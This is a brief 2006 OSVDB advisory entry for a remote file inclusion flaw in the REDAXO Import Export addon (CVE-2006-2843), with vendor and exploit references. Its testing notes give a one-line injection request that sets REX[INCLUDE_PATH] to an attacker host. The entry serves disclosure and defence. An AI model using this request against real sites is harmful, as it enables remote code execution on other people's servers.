REDAXO Import Export Addon index.inc.php REX[INCLUDE_PATH] Variable Remote File Inclusion

2006-06-01T09:05:16
ID OSVDB:25958
Type osvdb
Reporter OSVDB
Modified 2006-06-01T09:05:16

Description

Manual Testing Notes

./redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=attacker

References:

Vendor URL: http://www.redaxo.de/ Secunia Advisory ID:20408 Secunia Advisory ID:20395 Related OSVDB ID: 25959 Related OSVDB ID: 25955 Related OSVDB ID: 25957 Related OSVDB ID: 25956 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0730.html Generic Exploit URL: http://milw0rm.com/exploits/1861 FrSIRT Advisory: ADV-2006-2109 CVE-2006-2843